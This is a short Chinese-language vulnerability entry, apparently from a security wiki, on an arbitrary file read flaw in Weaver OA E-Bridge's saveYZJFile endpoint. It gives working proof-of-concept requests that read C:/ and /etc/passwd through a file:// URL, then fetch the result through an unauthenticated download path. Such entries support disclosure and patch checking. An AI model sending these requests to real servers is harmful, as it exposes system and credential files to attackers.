泛微OA E-Bridge saveYZJFile 任意文件读取漏洞¶
漏洞描述¶
泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
影响版本¶
网络测绘¶
漏洞复现¶
# Windows验证POC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
成功返回 id值
,说明含有此漏洞
¶
# Linux验证POC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
成功返回 id值
,说明含有此漏洞
调用查看文件接口访问 /file/fileNoLogin/id值